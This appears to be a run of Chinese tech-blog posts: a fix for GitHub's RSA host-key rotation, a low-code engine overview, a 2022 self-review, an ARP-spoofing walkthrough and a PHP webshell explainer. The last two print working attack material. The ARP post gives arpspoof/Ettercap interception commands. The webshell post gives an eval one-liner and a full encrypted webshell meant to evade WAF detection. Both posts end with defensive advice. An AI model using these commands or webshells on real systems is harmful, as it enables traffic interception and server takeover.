**2023 年 3 月 23 日，GitHub 官方发布了一条公告，称他们的 RSA SSH Host Key 受到了泄露。这一消息引起了广泛的关注和担忧，因为 RSA SSH Host Key 是保障 SSH 连接安全的关键。在本文中，我们将深入探讨这一事件的起因、影响和应对措施。**



## RSA SSH Host Key 是什么以及其在 GitHub 上的作用

RSA SSH Host Key 通过使用公钥/私钥对来实现身份验证。当客户端首次连接到 SSH 服务器时，服务器会将其 RSA SSH Host Key 发送给客户端，客户端使用该公钥对该 RSA SSH Host Key 进行验证。如果验证成功，客户端将 RSA SSH Host Key 添加到其本地的“known_hosts”文件中，并将来连接到该服务器时使用该 RSA SSH Host Key 进行身份验证。

区别于本地的公钥/私钥，RSA SSH Host Key 用于验证 SSH 服务器的身份，而公钥/私钥对用于验证客户端的身份，有点像双向校验，可以有效的防止中间人攻击。

## 事件发生的时间和经过

Github官方发现RSA SSH Host Key 私钥在一个公共 GitHub 存储库中短暂地公开了。他们立即采取行动控制暴露，并开始调查，以了解根本原因和影响。

在3月24日世界时大约05:00时，出于谨慎，官方更换了用于保护 [GitHub.com](http://GitHub.com) 的 Git 操作的 RSA SSH 主机密钥。这样做是为了保护用户免受任何对手模仿 GitHub 或通过 SSH 窃听他们的 Git 操作的机会。此密钥不授予对 GitHub 基础设施或客户数据的访问权限。此更改仅影响通过使用 RSA 的 SSH 进行的 Git 操作。

## 可能对GitHub 用户带来的风险

一旦RSA SSH Host Key泄露，攻击者就有可能冒充GitHub服务器，获取用户的敏感信息，进而危及用户的代码和账户的安全。以下是可能对开发者和GitHub用户带来的风险：

1. 篡改代码：攻击者可能会利用RSA SSH Host Key的泄露，篡改开发者的代码，使得开发者提交的代码被修改或者添加恶意代码，从而导致开发者在不知情的情况下发布了不安全的代码。
2. 窃取敏感信息：攻击者可能会利用RSA SSH Host Key的泄露，窃取开发者和GitHub用户的敏感信息，如用户名、密码、SSH私钥等。一旦敏感信息泄露，攻击者可能会利用这些信息进行恶意操作，如篡改代码、冒充用户进行恶意访问等。
3. 拒绝服务攻击：攻击者可能会利用RSA SSH Host Key的泄露，进行拒绝服务攻击，使得GitHub服务器无法正常运行，影响开发者和用户的正常使用。

总之RSA SSH Host Key泄露可能会对开发者和GitHub用户带来严重的安全风险。

官方是这样回复的：请注意，这个问题不是任何 GitHub 系统或客户信息泄露的结果。相反，这次曝光是我们认为是无意中泄露了私人信息的结果。我们没有理由相信暴露的钥匙被滥用，并采取了这一行动出于充分的谨慎。

**并且官方已经更换了RSA SSH Host Key，这将会导致我们的clone、push、pull等操作无法正常运行。**

## 应对措施

Github官方修改SSH Host Key 以后，会导致用户无法使用SSH连接[GitHub.com](http://GitHub.com)，

如果在通过 SSH 连接到 [GitHub.com](http://GitHub.com) 时看到以下消息，请继续阅读

```
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
SHA256:uNiVztksCsDhcc0u9e8BujQXVUpKZIDTMczCvj3tD2s.
Please contact your system administrator.
Add correct host key in ~/.ssh/known_hosts to get rid of this message.
Host key for github.com has changed and you have requested strict checking.
Host key verification failed.
```

在终端中运行以下命令：

```bash
# 删除known_hosts文件中github.com条目，从而使下一次连接 github.com 时，客户端会重新验证 github.com 的 RSA SSH Host Key，以确保安全连接
ssh-keygen -R github.com
# 更新本地 SSH 客户端的 known_hosts 文件，以确保在使用 SSH 连接到 GitHub 时，能够正确地验证 GitHub 的身份，并保证连接的安全性
curl -L https://api.github.com/meta | jq -r '.ssh_keys | .[]' | sed -e 's/^/github.com /' >> ~/.ssh/known_hosts
```

接着就可以愉快的往Github上面拉取、提交代码了。

## 参考

****[We updated our RSA SSH host key](https://github.blog/2023-03-23-we-updated-our-rsa-ssh-host-key/)****

震惊！2023 年 3 月 23 日后，Github既然无法提交代码

**当今，软件开发的速度和效率已经成为企业发展的重要因素之一。然而，传统的软件开发流程通常需要大量的时间和资源来完成。因此，很多企业开始转向low-code平台，以提高软件开发的效率和速度。阿里的`lowcode-engine`是其中的一款优秀平台，它为用户提供了一个基于云的可视化编程环境，使得用户可以通过简单的拖放操作，快速地创建出高质量的应用程序。**



## 什么是低代码？

零代码、低代码的概念在整个全球行业内已经流行了很长一段时间。通常意义上的低代码定义会有三个关键点：

1. 一个用于生产软件的可视化编辑器
2. 中间包含了一些用于组装的物料，可以通过编排、组合和配置它们以生成丰富的功能或表现
3. 最后的实施结果是成本降低

**注：低代码不是银弹，它往往是某个具体层面的解决方案**

## 如何开发一个低代码平台？

从零开发一个低代码的平台，需要考虑到很多事项：

- 平台的架构设计：低代码平台需要一个灵活、可扩展、高可用性的架构，能够支持不同的应用场景和不同的开发人员，同时保证数据安全和用户隐私
- 可视化编辑器的设计：低代码平台的核心功能是可视化编辑器，它需要具备良好的用户体验和易用性，能够支持拖拽式的界面设计和流程设计，同时能够生成高质量的代码和文档
- 集成第三方组件和服务：低代码平台需要能够集成各种第三方组件和服务，如数据库、API、消息队列、人工智能等，以便开发人员可以快速构建各种应用
- 自定义代码的扩展性：低代码平台需要支持开发人员在平台上自定义代码，以满足特定的业务需求和技术要求

当然考虑的不只仅仅上面这几点，一个成熟的低代码平台还需要考虑数据安全和用户隐私、运维和监控……，综上所述，构建一个低代码平台需要面对众多的难点，需要具备较高的技术实力和业务理解能力，如果你和我一样，不想从头开始去考虑这些复杂的事情，可以选择一个完备的低代码引擎，我选择的是 [alibaba/lowcode-engine](https://github.com/alibaba/lowcode-engine)，他的优势在于：

- 低代码设计器：包括入料、编排、组件配置、画布渲染等等
- 定制扩展能力：支持面板扩展、物料扩展、编排扩展、设置器扩展
- 提供基础物料、插件（数据源、JS面板、预览、出码等等）
- 提供CLI工具，快速创建物料、设置器、插件、编辑器扩展
- 高质量的中文文档

## lowcode-engine 优势

### 低代码设计器

`lowcode-engine`直接提供了画布渲染、组件编排、组件属性配置等功能

![image.png](https://blog.ccz.life/static/img/e3c9442d0c33f0d66a5b6989fa96531e.image.png)

### 定制扩展能力

面板 API 提供了面板扩展和管理的能力，如下图蓝色内容都是扩展出来的

![image.png](https://blog.ccz.life/static/img/99dc005775322e9141a8d3bbfb4f8bb3.image.png)

此外，也可以对物料扩展、编排扩展、设置器扩展、操作辅助区扩展

![image.png](https://blog.ccz.life/static/img/3534c1f5a17b9e5db630d531da63dc3d.image.png)

### 提供基础物料、插件

官方提供了`antd、fusion`低代码物料

![image.png](https://blog.ccz.life/static/img/37487476f42964fa2c92adebe4dc16ea.image.png)

提供了历史插件、源码面板、Schema编辑等功能

![image.png](https://blog.ccz.life/static/img/86aaba56f8a5d2238d49dd89eda70d10.image.png)

### 提供CLI工具

通过官方的`CLI`工具，快速创建扩展，下面举一个插件开发的例子：

```bash
npm init @alilc/element your-plugin-name
```

![image.png](https://blog.ccz.life/static/img/9529e7eccd1462fd9643bd214c309671.image.png)

根据操作完善信息

![image.png](https://blog.ccz.life/static/img/c6655349d6770ba88b88fcaf71b099e1.image.png)

### 高质量的中文文档

[文档地址](https://lowcode-engine.cn/site/docs/guide/quickStart/intro)


![image.png](https://blog.ccz.life/static/img/9c2c6c4317603a56f7d212d993e2d728.image.png)

## 渲染模块、出码模块

低代码引擎的编辑器将产出两份数据：

- 资产包数据 assets：包含物料名称、包名及其获取方式，对应协议中的[《低代码引擎资产包协议规范》](https://lowcode-engine.cn/site/docs/specs/assets-spec)
- 页面数据 schema：包含页面结构信息、生命周期和代码信息，对应协议中的[《低代码引擎搭建协议规范》](https://lowcode-engine.cn/site/docs/specs/lowcode-spec)

经过上述两份数据，可以直接交由渲染模块或者出码模块来运行，二者的区别在于：

- 渲染模块：使用资产包数据、页面数据和低代码运行时，并且允许维护者在低代码编辑器中用 `低代码（LowCode）`的方式继续维护；
- 出码模块：不依赖低代码运行时和页面数据，直接生成可直接运行的代码，并且允许维护者用 `源码（ProCode）` 的方式继续维护，但无法再利用低代码编辑器；

### **低代码的生产和消费流程总览**

![image.png](https://blog.ccz.life/static/img/40182787ffdf2c739154a1e54707cb73.image.png)

## 架构

### 分层架构

![image.png](https://blog.ccz.life/static/img/c52415eeaeed511a0c75aab32dda9a4a.image.png)
自下而上分别是协议 - 引擎 - 生态 - 平台

- 底层协议栈定义的是标准，标准的统一让上层产物的互通成为可能。
- 引擎是对协议的实现，同时通过能力的输出，向上支撑生态开放体系，提供各种生态扩展能力。
- 生态就好理解了，是基于引擎核心能力上扩展出来的，比如物料、设置器、插件等，还有工具链支撑开发体系。
- 最后，各个平台基于引擎内核以及生态中的产品组合、衔接形成满足其需求的低代码平台。

### **引擎内核简述**

![image.png](https://blog.ccz.life/static/img/89b01e504ebefa9b080007c07a275060.image.png)

低代码引擎分为 4 大模块，入料 - 编排 - 渲染 - 出码：

- 入料模块就是将外部的物料，比如海量的 npm 组件，按照《物料描述协议》进行描述。将描述后的数据通过引擎 API 注册后，在编辑器中使用。
- 编排，本质上来讲，就是不断在生成符合[《低代码引擎搭建协议规范》](https://lowcode-engine.cn/site/docs/specs/lowcode-spec)的页面描述，将编辑器中的所有物料，进行布局设置、组件 CRUD 操作、以及 JS / CSS 编写/ 逻辑编排 等，最终转换成页面描述，技术细节后文会展开。
- 渲染，顾名思义，就是将编排生成的页面描述结构渲染成视图的过程，视图是面向用户的，所以必须处理好内部数据流、生命周期、事件绑定、国际化等。
- 出码，就是将编排过程产生的符合[《低代码引擎搭建协议规范》](https://lowcode-engine.cn/site/docs/specs/lowcode-spec)的页面描述转换成另一种 DSL 或 编程语言代码的过程。

## 参考

[阿里低代码引擎简介](https://lowcode-engine.cn/site/docs/guide/quickStart/intro)

全面了解 Low Code 引擎之什么是低代码

**当我们踏入 2023 年之际，回顾 2022 年的所见所闻，让我不禁想起那句“岁月匆匆，时光荏苒”。在这个充满变化与挑战的一年里，我也经历了许多值得回顾和总结的事情。**




# 上半年：


## **工作：**

- 项目日常迭代 
- 项目改造 `微前端、MUI，后续项目被推翻`
- Vite 在项目中落地
- Node 日志服务落地
- 结构组织变更 `业务部门 ⇒  平台架构`

## **个人成长：**

- 团队内部分享：《孙子兵法》
- 微前端 `qiankun`
- MUI
- Vite学习
- Node：最佳规范学习、日志相关学习 `winston`
- 复习计划：基础知识、React Fiber深究、React 18 UI Concurrent Mode学习、Webpack、算法学习
- 书籍：《被讨厌的勇气》

## **总结：**

**有新技术的尝试，但是不多，好在有两项落地**

- 微前端、MUI
- Vite落地
- Node最佳规范学习
- Node日志服务落地
- 复习计划

上半年`币圈跌太狠，心态发生变化`

**技术⇒业务落地能力差**

Vite去年规划的落地，但是在落地过程中经常出现Vite因开发环境和生产环境构建工具链不一致产生的问题，即开发环境代码正常运行，生产环境代码运行出错。

个人产生疑虑：

①.怕上线前，某些模块测试不到位，引发线上bug

②.后续应用开发时也会出现开发环境可用，但是生产环境不可用

但其实这些问题都是可以通过自己解决的，还是`缺乏冒险者精神`**。**

后续可以落地，也是在组内同事的牵头下才得以完成。

**看书方面，自驱力太差**

明明安排好的时间，却都在刷短视频，`时间管理差`，一周只有两三个小时看书

好在读书的时候认真，吸收较多，但是得加多看书的时间

**结构组织变更**

影响较大，改变不了环境，只能改变自己了

# 下半年：

## **工作：**

- 项目日常迭代 
- 开放平台、开放平台后台页开发 `DNA改版新规划、微前端落地`
- 六路监控平台改造 `作为开发平台应用进行上架`

## **个人成长：**

- 团队内部分享：《印度种姓制度》
- 新建脚手架 `quick-vite-web`
- 微前端 `MicroApp、Wujie`
- CSS原子化 `Tailwindcss`
- MUI组件封装
- 前端 + 客户端 = 终端 认知
- 复习计划：上半年涉及到的知识重新梳理、React源码、Vue和React实现上的区别
- 书籍：《骆驼祥子》

## **总结：**

**没有后端方面的知识涉猎，前端知识方面也无建树**

- 新建脚手架
- 微前端
- MUI组件封装
- 复习计划

**项目管理方面太弱，需要提前学习相关知识，主动出击承担任务**

项目管控方面一直没有过多参与，一直是作为开发者的身份

开发者⇒项目管理者，需要注意的事项，如何处理好人际关系

自身能力的突破，得靠自己一步一步的积累

**UI组件封装没有做到位**

MUI组件本身更多的是为我们提供原子化的组件，细粒化程度非常高。我们需要像搭积木一样，将这些原子化的组件进行组装。

```jsx
//antd 
<Table columns={columns} dataSource={data} />

//mui 
<TableContainer component={Paper}>
      <Table>

        <TableHead>
          <TableRow>
          {columns.map((col)=>(
            <TableCell>
                   ......
              </TableCell>
            ))}
          </TableRow>
        </TableHead>

        <TableBody>
          {data.map((row) => (
            <TableRow>
              <TableCell>
                   ......
              </TableCell>
            </TableRow>
          ))}
        </TableBody>

      </Table>
    </TableContainer>
```

目标是将这一大串的Table相关组件，封装为<Table/>，前期进行封装的时候，也探讨过相关细节。

但是在最后使用的时候，总感觉不得劲，很多情况下需要往组件里面新增属性以应对新需求。

后续应该注意的点：

①.封装的组件，所有的Element都应该加class类名，不准使用style或者sx的方式修改样式

②.规划时，不应该将Table、Form这类组件定义为业务组件，如果有很复杂的Table组件，应该考虑使用基础组件组装的方式进行拼接。

定义为业务组件的劣势在与，UI、内部逻辑处理都会高度耦合，但实际上每套页面都会有自己的复杂度，有自己的相互逻辑，强行结合后，在其它页面进行使用，需要大费周章的修改样式。

和UI设计师也很难定义出一套可以通用的业务组件。

③.无非必要，不新增组件Props。现在我们是通过组装MUI的组件，去达到一个我们理想中的基础组件的效果。但MUI组件颗粒度非常细，譬如我现在分别要在`TableContainer、Table`上新增Props时，比较好的做法是

```jsx
<Table props={{
 TableProps:
 TableContainerProps:
}}>
```

使用MUI组件需要投入较大的精力，去做好组件的封装，要不然真的非常难，很难组件都需要自己去实现，比如Form、Upload、（Modal、Message Api方式调用）……

还是Antd做的更大更全而且还免费，拿上来可以直接开发项目，不过喜欢自己动手封装组件的话，MUI也是不错的选择。

**事情还是得多记多写，不能只停留于看**

年初看了几篇神文，但是当时仅仅是看，没有上手操作，一直没能懂文章封神的原因。

年尾再次阅读到，一步一步根据文章操作，才发现真是一步一步娓娓道来，使我眼前一亮，豁然开朗。而且这一两年，我发现自己看文章，仅仅停留于看，很少会上手操作，当时认为的懂，我觉得和实际上的懂，有着很大的差距。可能和近年来刷短视频有关系，短暂的知识碎片，并没有对我的大脑进行输入。

**终端认知**

此终端，非彼终端。

终端概念是我今年在D2圆桌之夜听到的，那何为终端，前端+客户端，那这和我们的大前端区别于哪里，为什么兴起终端呢？

说白了，我们可以把终端理解成一个岗位，以后没有前端开发工程师，也没有客户端开发工程师，

只有终端开发工程师，终端开发工程师具有处理前端和客户端的能力，那这样就意味着终端开发工程师相较于其他岗位，至少需要有更广的知识面。

那终端开发工程师的优势在哪里？

第一点当然是降本，2022年的互联网冬天比去年更冷，各大互联网巨头都在裁员降本，如果能将终端这条路实践走通，真正意义上的将两个岗位合并成一个岗位，是有利于公司降本。

第二点是提效，原先在会议上讨论这个业务需求是客户端做还是前端做，如果现在你属于一位终端开发工程师，那就不会有这样的争论。至于是选前端技术来做还是客户端技术来做，技术方案都由你这边敲定。原先因为工种不同的薄纱被掀开，你也会真正的站在一个开发者的角度去进行选型，而不是把时间浪费在无意义的争论上，可能因为这块业务没有绩效的增长点，你就会说这一块我们做不了，需要给你们做，你们更适合。

走通终端这条路，一定会遇到很多问题，两端的融合，不是一蹴而就的，是需要人才的积累加上实践的真知，如果走通，将大大提高入行门槛。可能是3年后，也可能是10年后，也可能是30年后

但我相信终端这条路是可以被实践走通的，打破两端壁垒，只是时间问题。

面对可能即将到来的风暴，加强自身的计算机基础会显得格外重要。

2022年自我总结

**当我们谈论计算机网络安全时，ARP攻击是一个经常被提及的话题。ARP（Address Resolution Protocol）是一个用于将IP地址映射到MAC地址的协议，它在局域网中广泛使用。但是，ARP协议存在一些安全漏洞，攻击者可以利用这些漏洞发起ARP攻击，从而获得对网络流量的控制权。在本文中，我们将深入探讨ARP攻击的原理、类型和如何保护网络免受其攻击。**



# 什么是ARP攻击
正常上网情况：普通用户上网前会先向路由器（网关）发送一个arp请求以询问路由器的mac地址，而路由器（网关）会返回一个arp响应告诉用户自己的mac地址，普通用户再向路由器（网关）发送数据包，网关转发到公网实现上网的目的。

看似此流程很安全，数据也没有泄露，但是存在一个缺陷，计算机会根据收到的arp响应的顺序来确定将要转发数据包的对象，此时假象，如果黑客不断向普通用户发送arp响应告诉普通用户网关的mac地址是自己，普通用户便会讲数据发送给黑客。

![Untitled.png](https://blog.ccz.life/static/img/2f84e1abdbd8f405f99934064ee13bb4.Untitled.png)

# 如何进行ARP攻击
以下测试均在Macos系统下进行:

**获取当前网关地址**
```jsx
arp -a  // ARP缓存列表
route get default // 当前网关地址

假设得到网关地址10.250.0.1，下面也会使用该地址为网关地址
```

**获取攻击机器IP**

```jsx
brew install nmap // 安装nmap工具
nmap -sP 10.250.0.1/24  // 扫描网关下的所有IP地址

假设攻击的IP为10.250.0.42
```

**开启IP转发**

```jsx
sudo sysctl -w net.inet.ip.forwarding=1 // mac
echo1 >/proc/sys/net/ipv4/ip_forward // linux 

sudo sysctl -a | grep forward // 查看本机IP转发情况

forwarding=1为开启转发，forwarding=0为关闭转发，关闭转发后，被攻击者会出现断网。
```

**ARP欺骗**

[**arpspoof安装**](https://github.com/YeautyYE/arpspoof)

```jsx
sudo arpspoof -i en0 -t 10.250.0.42 10.250.0.1
```

**抓包**

**[Wireshark安装](https://macwk.com/soft/wireshark)**

```jsx
sudo chmod 777 /dev/bpf* 

Wireshark filter 输入 ip.src == 10.250.0.42&&http
```

**以上方法仅能抓包http的包，若需要抓取https**

需要安装Ettercap

```jsx
brew install ettercap 
brew install adwaita-icon-theme //内置gtk3
sudo ettercap -G

// sudo ettercap -G 若无法运行，则添加下面依赖
brew install libtiff
brew install gtk+3
```
[**Ettercap使用介绍**](https://blog.csdn.net/smli_ng/article/details/106133685)

# 预防ARP攻击
1. 使用静态ARP表：静态ARP表允许管理员手动将MAC地址与IP地址进行映射，以确保只有授权设备可以访问网络。这可以有效防止ARP缓存中被篡改的MAC地址。
2. 实施网络访问控制：实施网络访问控制可以防止未经授权的设备连接到网络。可以使用诸如802.1x认证等技术来确保只有授权设备可以连接到网络。
3. 使用网络监控工具：网络监控工具可以检测并报告网络中的ARP攻击。例如，可以使用网络流量分析工具来检测ARP欺骗攻击并采取相应的措施。
4. 定期更新网络设备的固件：网络设备厂商通常会发布针对已知漏洞的补丁程序。更新网络设备的固件可以修补可能存在的安全漏洞，从而提高网络的安全性。
5. 启用端口安全：启用端口安全可以防止未经授权的设备在网络端口上进行连接。可以使用诸如端口安全协议（Port Security Protocol）等技术来防止ARP欺骗攻击。
6. 加强员工的安全意识培训：ARP攻击通常需要攻击者在网络上运行恶意软件或者欺骗受害者进行某些操作，加强员工的安全意识培训可以提高他们对这些攻击的识别能力，并减少这些攻击的成功率。

ARP 攻击

**当谈到计算机安全时，"木马"经常被提及。这种恶意软件可以通过一行代码来危害你的计算机系统，其影响可能非常严重。虽然它可能只是一行代码，但是却可以打开恶意攻击者的门户，使他们能够在你的计算机上执行各种不良操作。本篇主要是通过对木马注入的讲解，提升网站建站者关于安全方面的知识。**

**以下是一些常见的注入方式：**

1. SQL注入：攻击者可以通过构造恶意的SQL查询来利用Web应用程序的安全漏洞，从而向数据库中注入恶意代码。
2. XSS（跨站脚本）注入：攻击者可以通过向受害者的浏览器中注入恶意的JavaScript代码来利用Web应用程序的安全漏洞。
3. 文件上传漏洞：攻击者可以通过上传包含恶意代码的文件来利用Web应用程序的安全漏洞，从而向服务器中注入恶意代码。
4. 命令注入：攻击者可以通过向Web应用程序提交恶意的命令来利用安全漏洞，从而向服务器中注入恶意代码。




# 一句话木马


📚 一句木马短小精悍，而且功能强大，隐蔽性非常好，在入侵中始终扮演着强大的作用。
黑客多在注册信息的电子邮箱或者个人主页等中运行该木马。

若当前的网站建站者，未对上传文件进行过滤，我们上传一段PHH文件

```php
<?php @eval($_POST['shell']); ?>
```

这是php的一句话后门中最普遍的一种。它的工作原理是：
首先存在一个名为shell的变量，shell的取值为HTTP的POST方式。
Web服务器对shell取值以后，然后通过eval()函数执行shell里面的内容。

💡 注入PHP脚本后，可以使用[**蚁剑**](https://github.com/AntSwordProject/antSword)软件达到控制对应网站的行为。


# 二进制加密木马

📚 一句话木马从最早的<%execute(request(“cmd”))%>到现在，也有快二十年的历史了。客户端工具也从最简单的一个html页面发展到现在的各种GUI工具。但是近些年友军也没闲着，涌现出了各种防护系统，这些防护系统主要分为两类：一类是基于主机的，如Host based IDS、安全狗、D盾等，基于主机的防护系统主要是通过对服务器上的文件进行特征码检测；另一类是基于网络流量的，如各种云WAF、各种商业级硬件WAF、网络防火墙、Net Based IDS等，基于网络的防护设备其检测原理是对传输的流量数据进行特征检测，目前绝大多数商业级的防护设备皆属于此种类型。**一旦目标网络部署了基于网络的防护设备，我们常用的一句话木马客户端在向服务器发送Payload时就会被拦截，这也就导致了有些场景下会出现一句话虽然已经成功上传，但是却无法连接的情况**。这个时候攻击者往往会选择注入二进制加密木马进行攻击。

[**二进制加密木马详情介绍**](https://xz.aliyun.com/t/2744)


```php
<?php
@error_reporting(0);
session_start();

if ($_SERVER['REQUEST_METHOD'] === 'POST')
{
    $key="453df1fd1cf2943a"; //这一行为密码的md5的前16位
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");

		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15];
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
}
?>
```

💡 使用软件：冰蝎
[**安装说明**](https://blog.csdn.net/weixin_43376075/article/details/109616289)
[**使用提示**](https://blog.csdn.net/qq_41874930/article/details/107916317)


# 为了抵御这些类型的攻击，您可以采取以下措施
1. 及时更新Web应用程序的安全补丁，以减少攻击者利用漏洞的机会。
2. 实施有效的身份验证和授权机制，确保只有授权用户可以访问应用程序。
3. 禁止PHP等脚本语言的文件上传，以防止恶意代码被注入到应用程序中。
4. 使用防火墙和安全软件等安全工具，以检测和防御恶意攻击。
5. 定期进行安全审计和漏洞扫描，以及加强员工的安全意识培训，以提高Web应用程序的安全性。